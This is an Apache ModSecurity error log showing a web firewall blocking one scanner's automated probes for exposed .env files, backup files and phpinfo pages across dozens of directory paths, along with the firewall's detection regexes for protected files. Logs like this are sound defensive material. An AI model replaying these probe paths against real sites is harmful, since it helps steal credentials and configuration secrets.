[Tue May 26 14:16:59.963568 2026] [security2:error] [pid 598542:tid 598554] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/front/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JVFQAAWAs"]
[Tue May 26 14:16:59.981428 2026] [security2:error] [pid 598542:tid 598559] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/frontend/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JVGQAAIRA"]
[Tue May 26 14:17:00.052474 2026] [security2:error] [pid 598542:tid 598606] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/infophp.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVJQAASD8"]
[Tue May 26 14:17:00.052861 2026] [security2:error] [pid 598542:tid 598603] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/infos.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVJgAASDw"]
[Tue May 26 14:17:00.052987 2026] [security2:error] [pid 598542:tid 598595] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/info.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVJAAASDQ"]
[Tue May 26 14:17:00.081910 2026] [security2:error] [pid 598542:tid 598608] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/laravel/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVKwAAV0E"]
[Tue May 26 14:17:00.101654 2026] [security2:error] [pid 598542:tid 598610] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/lms/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVLAAAaEM"]
[Tue May 26 14:17:00.127007 2026] [security2:error] [pid 598542:tid 598611] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/local/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVLwAAD0Q"]
[Tue May 26 14:17:00.138699 2026] [core:crit] [pid 598542:tid 598614] (13)Permission denied: [remote 45.148.10.95:10086] AH00529: /home2/jhonwy9v/dimensioncorporativa.com/login/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home2/jhonwy9v/dimensioncorporativa.com/login/' is executable
[Tue May 26 14:17:00.155504 2026] [core:crit] [pid 598542:tid 598638] (13)Permission denied: [remote 45.148.10.95:10086] AH00529: /home2/jhonwy9v/dimensioncorporativa.com/login/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home2/jhonwy9v/dimensioncorporativa.com/login/' is executable
[Tue May 26 14:17:00.161990 2026] [security2:error] [pid 598542:tid 598598] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/market/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVMwAAMjc"]
[Tue May 26 14:17:00.184151 2026] [security2:error] [pid 598542:tid 598639] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/marketing/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVNAAAdGA"]
[Tue May 26 14:17:00.193522 2026] [security2:error] [pid 598542:tid 598616] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/media/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVNgAAYkk"]
[Tue May 26 14:17:00.213513 2026] [security2:error] [pid 598542:tid 598664] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/new/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVOgAAHHk"]
[Tue May 26 14:17:00.216314 2026] [security2:error] [pid 598542:tid 598582] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/node-api/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVOwAAHCc"]
[Tue May 26 14:17:00.236185 2026] [security2:error] [pid 598542:tid 598665] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/node/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVPAAAWno"]
[Tue May 26 14:17:00.261754 2026] [security2:error] [pid 598542:tid 598621] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/node/api/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVPQAAQk4"]
[Tue May 26 14:17:00.279127 2026] [security2:error] [pid 598542:tid 598620] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/node/backend/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVPgAASk0"]
[Tue May 26 14:17:00.285613 2026] [security2:error] [pid 598542:tid 598623] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/nodeweb/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVQQAAL1A"]
[Tue May 26 14:17:00.285767 2026] [security2:error] [pid 598542:tid 598624] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/nodeapi/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVQAAAL1E"]
[Tue May 26 14:17:00.333807 2026] [security2:error] [pid 598542:tid 598630] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/old/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVRwAAElc"]
[Tue May 26 14:17:00.342114 2026] [security2:error] [pid 598542:tid 598668] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/opt/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVSQAAS30"]
[Tue May 26 14:17:00.516269 2026] [security2:error] [pid 598542:tid 598544] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/php-info.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVYgAAXQE"]
[Tue May 26 14:17:00.520810 2026] [security2:error] [pid 598542:tid 598543] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/php.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVYwAAUAA"]
[Tue May 26 14:17:00.533285 2026] [security2:error] [pid 598542:tid 598618] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/php_info.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVZAAADUs"]
[Tue May 26 14:17:00.570706 2026] [security2:error] [pid 598542:tid 598573] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/phpinfo.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVZgAAXh4"]
[Tue May 26 14:17:00.586024 2026] [security2:error] [pid 598542:tid 598635] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/portal/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVaAAAcVw"]
[Tue May 26 14:17:00.615491 2026] [security2:error] [pid 598542:tid 598647] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/prod/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVawAAGGg"]
[Tue May 26 14:17:00.640550 2026] [security2:error] [pid 598542:tid 598637] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/product/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVbwAAHV4"]
[Tue May 26 14:17:00.645461 2026] [security2:error] [pid 598542:tid 598653] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/production/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVcAAAHW4"]
[Tue May 26 14:17:00.659705 2026] [security2:error] [pid 598542:tid 598659] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/project/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVcwAAH3Q"]
[Tue May 26 14:17:00.668359 2026] [security2:error] [pid 598542:tid 598547] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/public-api/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVdQAAHwQ"]
[Tue May 26 14:17:00.679699 2026] [security2:error] [pid 598542:tid 598658] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/public/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVegAAOXM"]
[Tue May 26 14:17:00.700232 2026] [security2:error] [pid 598542:tid 598549] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/public/phpinfo.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVewAAVgY"]
[Tue May 26 14:17:00.732213 2026] [security2:error] [pid 598542:tid 598660] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/public_html/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVgAAAEXU"]
[Tue May 26 14:17:00.740450 2026] [security2:error] [pid 598542:tid 598571] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/qa/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVggAAERw"]
[Tue May 26 14:17:01.039200 2026] [security2:error] [pid 598542:tid 598588] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/s3/.env.bak"] [unique_id "ahVeBf4iWyZxnXeAW3JVqQAAAy0"]
[Tue May 26 14:17:01.122389 2026] [security2:error] [pid 598542:tid 598791] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVeQAAAHc"]
[Tue May 26 14:17:01.128178 2026] [security2:error] [pid 598542:tid 598559] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/server/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JVswAADxA"]
[Tue May 26 14:17:01.128523 2026] [security2:error] [pid 598542:tid 598600] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/server/api/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JVtAAADzk"]
[Tue May 26 14:17:01.185111 2026] [security2:error] [pid 598542:tid 598646] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/server/backend/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JVtgAAMGc"]
[Tue May 26 14:17:01.272107 2026] [security2:error] [pid 598542:tid 598610] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/service/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JVygAAdEM"]
